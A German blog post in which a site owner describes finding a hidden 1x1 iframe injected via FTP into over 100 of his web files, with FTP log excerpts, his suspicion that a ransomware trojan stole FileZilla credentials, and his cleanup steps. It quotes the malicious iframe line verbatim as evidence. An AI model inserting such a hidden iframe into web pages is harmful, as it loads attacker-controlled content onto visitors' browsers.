Angriff auf FTP-Server – Zusammenhang mit Ukash-Trojaner?

Vor etwa 2 Wochen war ich gerade am Schreiben eines Artikels, als ich beim Aufruf meiner eigenen Websites von meiner Avast Internet-Security gewarnt wurde, dass das Laden von Schadcode blockiert wurde. Zuerst habe ich mir nichts dabei gedacht, da ich der Meinung war, dass es nur wieder irgend ein komischer Banner als Werbung auf meine Seite geschafft hat. Sowas wird dann ja recht schnell vom Werbenetzwerk entfernt.

Doch der Aufruf sämtlicher Websites auf meinem Server führte zu einer Warnung! Auffällig war, dass dies nur bei meinen bei All-Inkl gehosteten Seiten so war, jedoch nicht auf meinem anderen Server. Meine erste Reaktion war dann eine Meldung an den Support, die recht schnell (Wie man es von All-Inkl.com kennt) beantwortet wurde: Man werde die Ursache suchen. Währenddessen habe ich selbst geschaut, was eigentlich los war.

Ein Blick in den HTML-Code der betroffenen Seiten verriet mir, dass ein iframe mit den Maßen 1px x 1px ganz oben eingebunden wurde. Ich habe das komplette FTP-Verzeichnis nach dem folgenden Schadcode durchsucht:

<iframe src=http://www.altstadtverein-alzey.de/w.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

Die URL altstadtverein-alzey.de sah mir nicht so aus, als ob die Betreiber der Seite den iframe selbst eingeschleust und die w.html auf Ihrem Server abgelegt hätten. Vielmehr wurde die Seite selbst Opfer eines Angriffs, dachte ich. Also habe ich schnell eine Mail an die Betreiber geschrieben, in der ich gewarnt habe und um Entfernung der w.html bat.

Gut, zurück zur Durchsuchung nach dem Schadcode. Die Suche lieferte über 100 infizierte Dateien, die alle einen der Namen main.php, index.html, index.php, base.php trugen. Das manuelle Entfernen der iframes brachte dann wieder Ruhe auf die Websites. Doch natürlich wollte ich wissen, wie es überhaupt dazu kommen konnte.

Lag es an WordPress? Immerhin habe ich 2 Wochen kein Update gemacht. Sicherheitshalber wurden dann erstmal alle Blogs in Sachen WordPress und Plugins aktualisiert. Außerdem habe ich mehrere Antivir-Plugins für WordPress laufen lassen, die aber nichts gefunden haben. Meiner Meinung nach sind solche Plugins Schrott, denn sie durchsuchen lediglich die Templates (Wenn ich das richtig in Erinnerung habe). Da eine Google-Suche nach der Problematik keine Ergebnisse brachte, war es aber sowieso eher unwahrscheinlich, dass WordPress der Übeltäter war.

Glücklicherweise waren inzwischen die neuesten Log-Dateien verfügbar und die brachten dann die Erleuchtung. Es fanden sich zw. 10:18 Uhr und 10:40 Uhr zig Einträge mit folgendem Schema:

Tue Jan 10 10:28:17 2012 1 ::ffff:188.72.226.162 871 /www/htdocs/abcdefgh/mysqldumper/index.php b _ o r abcdefgh ftp 0 * c
Tue Jan 10 10:28:18 2012 0 ::ffff:188.72.226.162 965 /www/htdocs/abcdefgh/mysqldumper/index.php b _ i r abcdefgh ftp 0 * c
Tue Jan 10 10:28:20 2012 1 ::ffff:188.72.226.162 1256 /www/htdocs/abcdefgh/mysqldumper/main.php b _ o r abcdefgh ftp 0 * c
Tue Jan 10 10:28:22 2012 0 ::ffff:188.72.226.162 1350 /www/htdocs/abcdefgh/mysqldumper/main.php b _ i r abcdefgh ftp 0 * c
Tue Jan 10 10:29:48 2012 0 ::ffff:188.72.226.162 2415 /www/htdocs/abcdefgh/mysqldumper/inc/home/home.php b _ o r abcdefgh ftp 0 * c
Tue Jan 10 10:29:52 2012 1 ::ffff:188.72.226.162 2509 /www/htdocs/abcdefgh/mysqldumper/inc/home/home.php b _ i r abcdefgh ftp 0 * c

Von der selben IP-Adresse wurden die oben genannten Dateien also zuerst heruntergeladen und wenige Sekunden später mit exakt 96 Bytes mehr Inhalt wieder hochgeladen. Diese 96 Bytes entsprechen genau der Länge des iframe-Codes. Eindeutig, dass der Angriff also per FTP ausgeführt wurde. Und zwar sehr gezielt! Es wurden nicht einfach sämtliche Dateien heruntergeladen, sondern nur die oben genannten. Auffällig war, dass nicht alle Dateien mit diesen Namen infiziert wurden, sondern nur ca. 80%. Besonders die Dateien im Admin-Bereich von WP wurden verschont. Die index.htmls von Webalyzer wurden dagegen fast alle verseucht.

Die lange Dauer des Angriffs (~12 Minuten) spricht gegen einen Bot, der hätte das in wenigen Sekunden geschafft. Dafür spricht aber, dass Adminbereiche scheinbar absichtlich gemieden wurden. Was meint ihr? Botangriff oder von Menschen durchgeführt?

Viel wichtiger ist jedoch die Frage Wie kommt jemand an meine FTP-Daten? Ich benutze ein sehr sicheres Passwort (>15 Zeichen und zufällig generiert), da scheiden die Methoden „raten“ und BruteForce schonmal aus. Irgendjemand muss wohl an das Passwort gekommen sein, indem er entweder einen Keylogger auf meinen Rechner gebracht oder gezielt die Konfiguration von FileZilla ausgelesen hat. Variante 2 scheint mir realistischer, da FileZilla die Zugangsdaten automatisch unverschlüsselt speichert.

Und in dem Zusammenhang fällt mir ein Vorfall ein, der sich in der Zeit von Silvester / Neujahr ereignet hat. Ich dachte immer, mir passiert sowas nicht, aber beim Surfen tauchte plötzlich das nette Hinweisfenster auf, das einige unter dem Namen BKA-Trojaner, Bundestrojaner, Ukash-Trojaner, etc. kennen. Ich solle doch bitte 50€ bezahlen und meine illegale Windowslizenz legalisieren lassen (oder so ähnlich). Tja, leider war Windows 7 vorinstalliert und somit definitiv nicht illegal 😉

Ich habe den Trojaner dann im abgesicherten Modus mit TrojanHunter / TrojanKiller (ich weiß den Namen gerade nicht) entfernt, neugestartet, mit Avira, Spybot und Avast einen Vollscan durchgeführt und nichts gefunden. Für mich war der Fall erledigt. Wahrscheinlich war es aber genau dieser Trojaner, der auch meine FTP-Daten ausgespäht hat.

Ich weiß von mindestens einer weiteren Person, dass diese genau das Selbe erlebt hat und auch den Ukash-Trojaner hatte. Kurze Zeit später war auch dort der altstadtverein-iframe auf der Seite zu finden. Es könnte also durchaus sein, dass der in direktem Zusammenhang mit dem iframe steht. Falls jemand hierzu etwas sagen kann, wäre ich sehr dankbar!

Letzte Woche habe ich dann zur Sicherheit die gesamte Festplatte komplett formatiert, Windows neu eingerichtet und alle weiteren Schritte unter einem eingeschränkten Benutzerkonto durchgeführt. Als Browser kommt jetzt ausschließlich die neueste Chrome-Version zum Einsatz, Security-Software ist Avast Internet Security + Windows-Firewall und die gesamte Software inkl. Windows sind auf dem neuesten Stand. Außerdem installiere ich nur noch Software, die ich wirklich benötige. Um alles aktuell zu halten, kommt Secunia PSI zum Einsatz.

Da beim Angriff wohl auch mein Router (Fritz!Box 7360, neueste Firmware) Schaden erlitten hat (Es waren 21 Ports freigegeben, die ich selbst nie freigegeben habe), habe ich auch den auf Werkseinstellungen zurückgesetzt und Dinge wie „Erlaube Programmen, die Sicherheitseinstellungen zu verändern“, entfernt. WLAN ist jetzt mit versteckter SSID und MAC-Filter aussgestattet und verbietet die Kommunikation von Geräten innerhalb des LANs. Man weiß ja nie, was die Mitbewohner alles auf ihren Rechnern haben 😉

Ich hoffe, dass ich mich jetzt wieder sicher fühlen darf und meine Websites nicht weiterhin in Gefahr schweben.

Der Text wurde etwas lang, Sorry dafür 😉 Ich würde mich jetzt freuen, wenn weitere Angriffsopfer sich melden würden und ihre Erfahrungen schildern könnten. Natürlich sind auch alle anderen Kommentare erwünscht!